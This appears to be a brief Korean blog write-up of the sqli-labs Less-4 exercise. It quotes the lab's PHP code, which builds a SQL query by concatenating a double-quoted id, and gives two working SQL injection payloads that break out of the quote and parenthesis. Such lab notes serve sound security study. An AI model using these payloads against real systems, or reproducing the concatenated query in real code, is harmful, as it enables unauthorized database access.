웹 해킹/sqli-labs-master
Less4-GET-Error based-Double Quotes-String
sonysame
2019. 3. 4. 22:09
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
?id=") or 1=1 --%20
?id=") or "1"=("1